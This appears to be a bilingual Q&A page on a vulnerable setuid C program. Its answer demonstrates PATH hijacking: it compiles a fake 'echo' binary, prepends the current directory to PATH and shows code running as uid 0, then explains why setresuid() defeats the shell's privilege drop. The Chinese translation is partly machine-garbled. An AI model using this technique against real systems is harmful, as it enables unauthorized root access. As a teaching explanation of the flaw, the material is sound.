什么是脆弱的这个C code吗？ [英] What is vulnerable about this C code?

问题描述

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/usr/bin/env echo and now what?");

}

我的理解是，在code以上允许任意code（或程序）执行 - 是什么让这个脆弱，一个人如何利用这一点

The way I understand it, the code above allows arbitrary code (or program) execution — what makes this vulnerable, and how does one take advantage of this?

推荐答案

您可以覆盖 PATH 变量指向的目录与<$ C $的自定义版本C>回声，自回声使用 ENV 被执行时，它不被视为一个内置的

You can override the PATH variable to point to a directory with your custom version of echo and since echo is executed using env, it isn't treated as a built-in.

这constitues漏洞只有code程序作为特权用户。

This constitues a vulnerability only if the code is run as privileged user.

在以下文件v.c的例子包含问题的code。

In the example below file v.c contains the code from the question.

$ cat echo.c
#include <stdio.h>
#include <unistd.h>

int main() {
  printf("Code run as uid=%d\n", getuid());
}
$ cc -o echo echo.c
$ cc -o v v.c
$ sudo chown root v
$ sudo chmod +s v
$ ls -l
total 64
-rwxr-xr-x  1 user     group  8752 Nov 29 01:55 echo
-rw-r--r--  1 user     group    99 Nov 29 01:54 echo.c
-rwsr-sr-x  1 root     group  8896 Nov 29 01:55 v
-rw-r--r--  1 user     group   279 Nov 29 01:55 v.c
$ ./v
and now what?
$ export PATH=.:$PATH
$ ./v
Code run as uid=0
$ 

请注意，真正的用户ID，有效用户ID的设置，并保存在通话设置用户ID为 setresuid（）调用之前系统（）在张贴的问题弱势code允许一个甚至利用该漏洞，当唯一有效的用户ID设置为特权用户ID和实际用户ID仍然没有特权（如为例子的情况上设置用户ID位依靠文件如上述时）。如果没有调用 setresuid（）按运行shell系统（）将重置有效用户ID回到现实用户ID使得攻击无效。然而，在情况下，当脆弱的code与（）特权用户的实际用户ID，系统单独调用足够运行。引用 SH 手册页：

Note that the setting of real user ID, effective user ID and saved set-user-ID by a call to setresuid() before the call to system() in the vulnerable code posted in the question allows one to exploit the vulnerability even when only effective user ID is set to a privileged user ID and real user ID remains unprivileged (as is for example the case when relying on set-user-ID bit on a file as above). Without the call to setresuid() the shell run by system() would reset the effective user ID back to the real user ID making the exploit ineffective. However, in the case when the vulnerable code is run with real user ID of a privileged user, system() call alone is enough. Quoting sh man page:

如果壳启动与有效用户（组）标识不等于实际用户
  （组）的ID，并没有提供-p选项，没有启动文件
  读，shell函数不会从环境中，SHELLOPTS变量，如果它继承
  出现在环境中，将被忽略，并且有效用户
  ID设置为真正的用户id。如果-p选项在调用供应，启动
  行为是一样的，但有效用户ID不会被重置。

If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS variable, if it appears in the environment, is ignored, and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.

另外，还要注意 setresuid（）是不可移植的，但的setuid（）或 setreuid（）也可被用于同样的效果。

Also, note that setresuid() isn't portable, but setuid() or setreuid() may also be used to the same effect.

这篇关于什么是脆弱的这个C code吗？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！